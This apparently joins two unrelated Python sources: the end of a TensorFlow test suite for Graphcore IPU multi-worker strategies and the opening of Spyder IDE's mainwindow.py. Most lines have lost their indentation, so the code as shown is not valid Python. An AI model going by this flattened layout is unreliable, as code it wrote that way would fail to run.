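      # task_id + 1; with momentum=0.0 the moving mean is replaced by it.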
task_local_mean = batch_norm.moving_mean._get_on_device_or_primary() # pylint: disable=protected-access
self.assertAllEqual([task_id + 1], sess.run(task_local_mean))
      # mean(mean(2, 0), mean(4, 0)) = mean(1, 2) = 1.5
global_mean = batch_norm.moving_mean
self.assertAllEqual([1.5], sess.run(global_mean))
# mean(var(2, 0), var(4, 0)) = mean(1, 4) = 2.5
self.assertAllEqual([2.5], sess.run(batch_norm.moving_variance))
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_batch_normalization(self):
self._run_between_graph_clients(self._test_batch_normalization,
self._cluster_spec,
num_gpus=0)
def _get_executed_nodes_by_device(run_metadata):
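  """Map each device in the RunMetadata step stats to its executed node names."""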
nodes_by_device = collections.defaultdict(list)
for dev_stats in run_metadata.step_stats.dev_stats:
for node_stats in dev_stats.node_stats:
nodes_by_device[dev_stats.device].append(node_stats.node_name)
return nodes_by_device
def _get_summary_values(model_dir, tag):
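  """Collect every simple_value logged for `tag` in the model_dir events file."""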
event_files = glob.glob(model_dir + "/*tfevents*")
if len(event_files) != 1:
raise ValueError("Expected exactly one events file in {}, found {}".format(
model_dir, len(event_files)))
outputs = []
for e in summary_iterator.summary_iterator(event_files[0]):
for v in e.summary.value:
if v.tag == tag:
outputs.append(v.simple_value)
return outputs
class IPUMultiWorkerStrategyV1MultiProcessTest(googletest.TestCase):
"""Tests using multiple processes."""
def _run_task_in_process(self, task_fn, cluster_spec, task_type, task_id):
def wrapper_fn():
os.environ["TF_CONFIG"] = json.dumps({
"cluster": cluster_spec,
"rpc_layer": "grpc",
"task": {
"type": task_type,
"index": task_id
}
})
task_fn(task_id)
return multiprocessing.Process(target=wrapper_fn)
def _run_workers_in_processes(self, task_fn, cluster_spec):
task_type = "worker"
processes = []
for task_id in range(len(cluster_spec[task_type])):
p = self._run_task_in_process(task_fn, cluster_spec, task_type, task_id)
p.start()
processes.append(p)
# Join all the processes before asserting to avoid any orphans.
for p in processes:
p.join()
for p in processes:
self.assertEqual(0, p.exitcode)
def _create_test_objects(self, start_server=True, variables_on_host=True):
cluster_resolver = TFConfigClusterResolver()
strategy = IPUMultiWorkerStrategyV1(cluster_resolver,
variables_on_host=variables_on_host)
sess_config = config_pb2.ConfigProto()
sess_config.allow_soft_placement = False
sess_config.log_device_placement = False
# The line below sets `sess_config.experimental.collective_group_leader`
sess_config = strategy.update_config_proto(sess_config)
if start_server:
server = server_lib.Server(cluster_resolver.cluster_spec(),
job_name=cluster_resolver.task_type,
task_index=cluster_resolver.task_id,
protocol=cluster_resolver.rpc_layer,
config=sess_config)
target = server.target
else:
target = None
return strategy, target, sess_config
def _test_reduction_in_compiled_cluster(self, task_id):
strategy, target, sess_config = self._create_test_objects()
with strategy.scope():
def device_fn(x):
y = x * x
# Test both without and with an explicit outside_compilation_scope.
sum_y = strategy.reduce(ReduceOp.SUM, y, axis=None)
z = sum_y * sum_y
with scopes.outside_compilation_scope():
sum_z = strategy.reduce(ReduceOp.SUM, z, axis=None)
return sum_z
inputs = array_ops.placeholder(dtype=np.float32, shape=())
with ipu_scope("/device:IPU:0"):
compiled_fn = ipu_compiler.compile(device_fn, inputs=[inputs])
config = IPUConfig()
config.auto_select_ipus = 1
tu.add_hw_ci_connection_options(config)
config.configure_ipu_system()
with session_lib.Session(target=target, config=sess_config) as sess:
[out] = sess.run(compiled_fn, feed_dict={inputs: task_id + 1})
self.assertEqual(out, 50.0) # 2 * (1^2 + 2^2)^2
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_reduction_in_compiled_cluster(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_reduction_in_compiled_cluster,
cluster_spec)
def _test_optimizer_in_compiled_cluster(self, task_id):
strategy, target, sess_config = self._create_test_objects(
variables_on_host=False)
per_worker_x = [i + 1.0 for i in range(strategy.num_replicas_in_sync)]
x = per_worker_x[task_id]
initial_w = 2.0
learning_rate = 0.5
with strategy.scope():
def device_fn(features):
w = variable_scope.get_variable(name="w", initializer=initial_w)
loss = w * features
optimizer = GradientDescentOptimizer(learning_rate)
return optimizer.minimize(loss)
def compiled_fn():
return ipu_compiler.compile(device_fn, inputs=[x])
train_op = strategy.run(compiled_fn, args=[])
config = IPUConfig()
config.auto_select_ipus = 1
tu.add_hw_ci_connection_options(config)
config.configure_ipu_system()
[w] = variables.global_variables()
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(w.initializer)
sess.run(train_op)
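      # The strategy sums the gradient d(w*x)/dw = x across the two workers,
      # so a single step moves w by learning_rate * (1.0 + 2.0) = 1.5.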
expected_w = initial_w - learning_rate * np.sum(per_worker_x)
self.assertEqual(expected_w, sess.run(w))
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_optimizer_in_compiled_cluster(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_optimizer_in_compiled_cluster,
cluster_spec)
def _test_pipelining(self, task_id):
strategy, target, sess_config = self._create_test_objects(
variables_on_host=False)
cpu_device = "/job:worker/replica:0/task:{}/device:CPU:0".format(task_id)
ipu_device = "/job:worker/replica:0/task:{}/device:IPU:0".format(task_id)
per_worker_x = [i + 1.0 for i in range(strategy.num_replicas_in_sync)]
y = 1.0
initial_w0 = 1.0
initial_w1 = 2.0
learning_rate = 0.5
gradient_accumulation_count = 4
num_iterations = 4
repeat_count = 2
num_session_runs, remainder = divmod(num_iterations, repeat_count)
self.assertEqual(remainder, 0)
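    # Each session.run() of the train op executes repeat_count pipeline
    # iterations, so num_session_runs runs cover all num_iterations.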
with strategy.scope():
x = per_worker_x[task_id]
features = [x] * num_iterations * gradient_accumulation_count
labels = [y] * num_iterations * gradient_accumulation_count
dataset = dataset_ops.Dataset.from_tensor_slices((features, labels))
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue()
def stage1(feature, label):
w0 = variable_scope.get_variable(name="w0", initializer=initial_w0)
self.assertIsInstance(w0, IPUMirroredVariable)
self.assertEqual(w0.device, ipu_device)
partial = w0 * feature
return partial, label
def stage2(partial, label):
w1 = variable_scope.get_variable(name="w1", initializer=initial_w1)
self.assertIsInstance(w1, IPUMirroredVariable)
self.assertEqual(w1.device, ipu_device)
prediction = partial + w1
loss = losses.mean_squared_error(label, prediction)
return loss
def optimizer_function(loss):
opt = GradientDescentOptimizer(learning_rate)
return pipelining_ops.OptimizerFunctionOutput(opt, loss)
def model():
pipeline_op = pipelining_ops.pipeline(
computational_stages=[stage1, stage2],
gradient_accumulation_count=gradient_accumulation_count,
repeat_count=repeat_count,
inputs=[],
infeed_queue=infeed_queue,
outfeed_queue=outfeed_queue,
optimizer_function=optimizer_function,
name="Pipeline")
return pipeline_op
def compiled_model():
return ipu_compiler.compile(model, inputs=[])
train_op = strategy.run(compiled_model, args=[])
config = IPUConfig()
config.auto_select_ipus = 2
tu.add_hw_ci_connection_options(config)
config.configure_ipu_system()
expected_w0 = initial_w0
expected_w1 = initial_w1
w0, w1 = variables.global_variables()
self.assertEqual("w0:0", w0.name)
self.assertEqual("w1:0", w1.name)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(infeed_queue.initializer)
sess.run(variables.global_variables_initializer())
run_metadata = config_pb2.RunMetadata()
for i in range(num_session_runs):
if i < num_session_runs - 1:
sess.run(train_op)
else:
# Save execution trace for the last run.
options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
sess.run(train_op, options=options, run_metadata=run_metadata)
for _ in range(repeat_count):
# L(x) = sum_i (w_0 * x_i + w_1 - y)^2
# dL(x)/dw_0 = sum_i 2 (w_0 * x_i + w_1 - y) x_i
grad_w0 = sum(2 * (expected_w0 * x_i + expected_w1 - y) * x_i
for x_i in per_worker_x)
accumulated_grad_w0 = gradient_accumulation_count * grad_w0
# dL(x)/dw_1 = sum_i 2 (w_0 * x_i + w_1 - y)
grad_w1 = sum(2 * (expected_w0 * x_i + expected_w1 - y)
for x_i in per_worker_x)
accumulated_grad_w1 = gradient_accumulation_count * grad_w1
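        # On the first repeat: grad_w0 = 2*(1+2-1)*1 + 2*(2+2-1)*2 = 16 and
        # grad_w1 = 2*2 + 2*3 = 10, accumulated to 64 and 40 over the 4 batches.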
expected_w0 -= learning_rate * accumulated_grad_w0
expected_w1 -= learning_rate * accumulated_grad_w1
self.assertEqual(expected_w0, sess.run(w0))
self.assertEqual(expected_w1, sess.run(w1))
# Do some sanity checks on what actually executed the last iteration.
nodes_by_device = _get_executed_nodes_by_device(run_metadata)
cpu_nodes = nodes_by_device[cpu_device]
ipu_nodes = nodes_by_device[ipu_device]
# There should be 2 reductions on the CPU per repeat loop iteration
# (one for each gradient).
self.assertEqual(2 * repeat_count,
sum(1 for n in cpu_nodes if "CollectiveReduce" in n))
# There should be 1 XLA run on the IPU
self.assertEqual(1, sum(1 for n in ipu_nodes if "xla_run" in n))
@tu.test_may_use_ipus_or_model(num_ipus=4)
def test_pipelining(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_pipelining, cluster_spec)
def _run_pipelining_example_with_keras_layers(self,
strategy,
dataset,
gradient_accumulation_count,
sess_target=None,
sess_config=None):
loss_vals = []
# Start of verbatim copy of example from ipu_multi_worker_strategy.py.
with strategy.scope():
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue()
def stage1(lr, images, labels):
partial = keras.layers.Dense(256, activation="relu")(images)
partial = keras.layers.Dense(128, activation="relu")(partial)
return lr, partial, labels
def stage2(lr, partial, labels):
logits = keras.layers.Dense(10)(partial)
per_example_loss = keras.losses.sparse_categorical_crossentropy(
y_true=labels, y_pred=logits, from_logits=True)
# In a custom training loop, the optimiser does an allreduce *sum*, not
# average, of the gradients across the distributed workers. Therefore
# we want to divide the loss here by the *global* batch size, which is
# done by the `tf.nn.compute_average_loss()` function.
loss = nn.compute_average_loss(per_example_loss)
return lr, loss
def optimizer_function(lr, loss):
optimizer = GradientDescentOptimizer(lr)
return pipelining_ops.OptimizerFunctionOutput(optimizer, loss)
def model(lr):
pipeline_op = pipelining_ops.pipeline(
computational_stages=[stage1, stage2],
gradient_accumulation_count=gradient_accumulation_count,
inputs=[lr],
infeed_queue=infeed_queue,
outfeed_queue=outfeed_queue,
optimizer_function=optimizer_function,
name="Pipeline")
return pipeline_op
def compiled_model(lr):
with ipu_scope("/device:IPU:0"):
return ipu_compiler.compile(model, inputs=[lr])
with ops.device("cpu"):
lr = array_ops.placeholder(np.float32, [])
train_op = strategy.run(compiled_model, args=[lr])
_, per_worker_losses = outfeed_queue.dequeue()
# Mean across the local `gradient_accumulation_count` batches:
per_worker_loss = math_ops.reduce_mean(per_worker_losses)
# Global mean across the distributed workers (since it is already
# divided by the global batch size above, we do a sum here):
global_loss = strategy.reduce(ReduceOp.SUM, per_worker_loss)
config = IPUConfig()
config.auto_select_ipus = 2
tu.add_hw_ci_connection_options(config)
config.configure_ipu_system()
ipu_utils.move_variable_initialization_to_cpu()
with session_lib.Session(target=sess_target, config=sess_config) as sess:
sess.run(infeed_queue.initializer)
sess.run(variables.global_variables_initializer())
for _ in range(10):
sess.run(train_op, {lr: 0.01})
global_loss_val = sess.run(global_loss)
# End of example code.
if loss_vals:
# Check that the loss decreases monotonically.
self.assertLess(global_loss_val, loss_vals[-1])
loss_vals.append(global_loss_val)
sess.run(infeed_queue.deleter)
sess.run(outfeed_queue.deleter)
return loss_vals
def _test_pipelining_example_with_keras_layers(self, task_id):
gradient_accumulation_count = 4
local_batch_size = 2
num_workers = 2
features = [
i * np.ones((1, 20), dtype=np.float32) for i in range(num_workers)
]
labels = [i * np.ones(1, dtype=np.int32) for i in range(num_workers)]
concat_features = np.concatenate(features)
concat_labels = np.concatenate(labels)
def mock_initializer_get(_identifier):
return init_ops.GlorotUniform(seed=42)
with test.mock.patch.object(keras.initializers, 'get',
mock_initializer_get):
# Test using the default non-distributed strategy. Each batch is twice
# the size, with the batches for the workers concatenated.
default_strategy = distribution_strategy_context._get_default_strategy() # pylint: disable=protected-access
with ops.Graph().as_default():
concat_dataset = dataset_ops.Dataset.from_tensor_slices(
(concat_features, concat_labels))
concat_dataset = concat_dataset.repeat().batch(num_workers *
local_batch_size,
drop_remainder=True)
losses_reference = self._run_pipelining_example_with_keras_layers(
default_strategy, concat_dataset, gradient_accumulation_count)
# Test using the actual distribution strategy. Each worker gets its own batch.
strategy, sess_target, sess_config = self._create_test_objects(
variables_on_host=False)
with ops.Graph().as_default():
local_dataset = dataset_ops.Dataset.from_tensor_slices(
(features[task_id], labels[task_id]))
local_dataset = local_dataset.repeat().batch(local_batch_size,
drop_remainder=True)
losses_distributed = self._run_pipelining_example_with_keras_layers(
strategy, local_dataset, gradient_accumulation_count, sess_target,
sess_config)
# The resulting losses should be the same, as distributed training should in
# general be equivalent to non-distributed training with concatenated batches.
np.testing.assert_almost_equal(losses_reference,
losses_distributed,
decimal=6)
@tu.test_may_use_ipus_or_model(num_ipus=4)
def test_pipelining_example_with_keras_layers(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(
self._test_pipelining_example_with_keras_layers, cluster_spec)
def _test_ipu_pipeline_estimator(self, task_id):
# The estimator library starts the server when configured in TF_CONFIG.
strategy, _, _ = self._create_test_objects(start_server=False,
variables_on_host=False)
ipu_device = "/job:worker/replica:0/task:{}/device:IPU:0".format(task_id)
num_iterations = 3
num_workers = strategy.num_replicas_in_sync
per_worker_x = [i + 1.0 for i in range(num_workers)]
y = 1.0
initial_w0 = 1.0
initial_w1 = 2.0
learning_rate = 0.5
gradient_accumulation_count = 4
num_steps = num_iterations * gradient_accumulation_count
def my_model_fn(mode):
def stage1(feature, label):
w0 = variable_scope.get_variable(name="w0", initializer=initial_w0)
self.assertIsInstance(w0, IPUMirroredVariable)
self.assertEqual(w0.device, ipu_device)
partial = w0 * feature
return partial, label
def stage2(partial, label):
w1 = variable_scope.get_variable(name="w1", initializer=initial_w1)
self.assertIsInstance(w1, IPUMirroredVariable)
self.assertEqual(w1.device, ipu_device)
prediction = partial + w1
loss = losses.mean_squared_error(label, prediction)
return loss
def optimizer_function(loss):
# Use momentum, but set to zero, just to verify that the
# momentum accumulator "slot" does not cause any problems.
opt = MomentumOptimizer(learning_rate, momentum=0.0)
return pipelining_ops.OptimizerFunctionOutput(opt, loss)
return ipu_pipeline_estimator.IPUPipelineEstimatorSpec(
mode=mode,
computational_stages=[stage1, stage2],
gradient_accumulation_count=gradient_accumulation_count,
optimizer_function=optimizer_function)
def my_input_fn(input_context):
self.assertEqual(task_id, input_context.input_pipeline_id)
x = per_worker_x[task_id]
features = [x] * num_steps
labels = [y] * num_steps
dataset = dataset_ops.Dataset.from_tensor_slices((features, labels))
return dataset
num_ipus_in_pipeline = 2
ipu_options = IPUConfig()
ipu_options.auto_select_ipus = num_ipus_in_pipeline
tu.add_hw_ci_connection_options(ipu_options)
config = ipu_run_config.RunConfig(
session_config=config_pb2.ConfigProto(allow_soft_placement=False),
train_distribute=strategy,
save_summary_steps=1,
ipu_run_config=ipu_run_config.IPURunConfig(
iterations_per_loop=gradient_accumulation_count,
num_shards=num_ipus_in_pipeline,
ipu_options=ipu_options))
estimator = ipu_pipeline_estimator.IPUPipelineEstimator(
model_fn=my_model_fn, config=config)
estimator_lib.train_and_evaluate(
estimator,
train_spec=estimator_lib.TrainSpec(input_fn=my_input_fn,
max_steps=num_steps),
eval_spec=estimator_lib.EvalSpec(input_fn=my_input_fn,
steps=num_steps))
expected_w0 = initial_w0
expected_w1 = initial_w1
expected_losses = []
for _ in range(num_iterations):
x = np.array(per_worker_x)
# The loss reduction op is decided by _get_loss_reduce_op_for_reporting()
loss = np.sum(np.square(expected_w0 * x + expected_w1 - y))
expected_losses.append(loss)
grad_w0 = np.sum(2 * (expected_w0 * x + expected_w1 - y) * x)
accumulated_grad_w0 = gradient_accumulation_count * grad_w0
grad_w1 = np.sum(2 * (expected_w0 * x + expected_w1 - y))
accumulated_grad_w1 = gradient_accumulation_count * grad_w1
expected_w0 -= learning_rate * accumulated_grad_w0 / num_workers
expected_w1 -= learning_rate * accumulated_grad_w1 / num_workers
# Only the chief worker has the checkpoint to read the variables from.
if task_id == 0:
self.assertEqual(num_steps, estimator.get_variable_value("global_step"))
self.assertEqual(expected_w0, estimator.get_variable_value("w0"))
self.assertEqual(expected_w1, estimator.get_variable_value("w1"))
loss_outputs = _get_summary_values(estimator.model_dir, "loss")
self.assertEqual(expected_losses, loss_outputs)
@tu.test_may_use_ipus_or_model(num_ipus=4)
def test_ipu_pipeline_estimator(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_ipu_pipeline_estimator,
cluster_spec)
def _test_dataset_infeed(self, task_id):
strategy, target, sess_config = self._create_test_objects()
with strategy.scope():
dataset = dataset_ops.Dataset.from_tensor_slices([0.0]).repeat()
# Test with a dataset host op.
dataset = dataset.map(lambda x: x + task_id)
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, x):
v += x
return v
def my_net():
r = loops.repeat(10, body, [0.0], infeed_queue)
return r
with ipu_scope("/device:IPU:0"):
[res] = ipu_compiler.compile(my_net, inputs=[])
config = IPUConfig()
config.auto_select_ipus = 1
tu.add_hw_ci_connection_options(config)
config.configure_ipu_system()
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(infeed_queue.initializer)
self.assertEqual(task_id * 10.0, sess.run(res))
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_dataset_infeed(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_dataset_infeed, cluster_spec)
def _test_ipu_estimator(self, task_id):
# The estimator library starts the server when configured in TF_CONFIG.
strategy, _, _ = self._create_test_objects(start_server=False,
variables_on_host=False)
ipu_device = "/job:worker/replica:0/task:{}/device:IPU:0".format(task_id)
num_iterations = 3
num_workers = strategy.num_replicas_in_sync
per_worker_x = [i + 1.0 for i in range(num_workers)]
y = 1.0
initial_w0 = 1.0
initial_w1 = 2.0
learning_rate = 0.5
def my_model_fn(features, labels, mode):
w0 = variable_scope.get_variable(name="w0", initializer=initial_w0)
self.assertIsInstance(w0, IPUMirroredVariable)
self.assertEqual(w0.device, ipu_device)
partial = w0 * features
w1 = variable_scope.get_variable(name="w1", initializer=initial_w1)
self.assertIsInstance(w1, IPUMirroredVariable)
self.assertEqual(w1.device, ipu_device)
prediction = partial + w1
loss = losses.mean_squared_error(labels, prediction)
# Use momentum, but set to zero, just to verify that the
# momentum accumulator "slot" does not cause any problems.
opt = MomentumOptimizer(learning_rate, momentum=0.0)
train_op = opt.minimize(loss)
return ipu_estimator.IPUEstimatorSpec(mode=mode,
loss=loss,
train_op=train_op)
def my_input_fn(input_context):
self.assertEqual(task_id, input_context.input_pipeline_id)
x = per_worker_x[task_id]
features = [x] * num_iterations
labels = [y] * num_iterations
dataset = dataset_ops.Dataset.from_tensor_slices((features, labels))
return dataset
ipu_options = IPUConfig()
ipu_options.auto_select_ipus = 1
tu.add_hw_ci_connection_options(ipu_options)
config = ipu_run_config.RunConfig(
session_config=config_pb2.ConfigProto(allow_soft_placement=False),
train_distribute=strategy,
save_summary_steps=1,
ipu_run_config=ipu_run_config.IPURunConfig(ipu_options=ipu_options))
estimator = ipu_estimator.IPUEstimator(model_fn=my_model_fn, config=config)
estimator_lib.train_and_evaluate(
estimator,
train_spec=estimator_lib.TrainSpec(input_fn=my_input_fn,
max_steps=num_iterations),
eval_spec=estimator_lib.EvalSpec(input_fn=my_input_fn))
expected_w0 = initial_w0
expected_w1 = initial_w1
expected_losses = []
for _ in range(num_iterations):
x = np.array(per_worker_x)
# The loss reduction op is decided by _get_loss_reduce_op_for_reporting()
loss = np.mean(np.square(expected_w0 * x + expected_w1 - y))
expected_losses.append(loss)
grad_w0 = np.sum(2 * (expected_w0 * x + expected_w1 - y) * x)
grad_w1 = np.sum(2 * (expected_w0 * x + expected_w1 - y))
expected_w0 -= learning_rate * grad_w0 / num_workers
expected_w1 -= learning_rate * grad_w1 / num_workers
# Only the chief worker has the checkpoint to read the variables from.
if task_id == 0:
self.assertEqual(num_iterations,
estimator.get_variable_value("global_step"))
self.assertEqual(expected_w0, estimator.get_variable_value("w0"))
self.assertEqual(expected_w1, estimator.get_variable_value("w1"))
loss_outputs = _get_summary_values(estimator.model_dir, "loss")
self.assertEqual(expected_losses, loss_outputs)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_ipu_estimator(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_ipu_estimator, cluster_spec)
if __name__ == "__main__":
test.main()
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import glob
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QMainWindow, QMenu,
QMessageBox, QShortcut, QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
qt_message_handler, set_links_color,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
get_safe_mode, is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.utils.image_path_manager import get_image_path
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
from spyder.app.solver import (
find_external_plugins, find_internal_plugins, solve_plugin_dependencies)
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
#==============================================================================
# Install Qt message handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
    def get_plugin(self, plugin_name, error=True):
        """
        Return a plugin instance by providing the plugin's name.
        """
        if plugin_name in self._PLUGINS:
            return self._PLUGINS[plugin_name]
        if error:
            raise SpyderAPIError(
                'Plugin "{}" not found!'.format(plugin_name))
        return None
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.NAME] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.NAME] = plugin
else:
self._INTERNAL_PLUGINS[plugin.NAME] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
            self.show_plugin_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
            plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
            # Fall back to None so the check below does not raise NameError.
            shortcut = None
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
        If a non-dockable plugin has the focus, this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
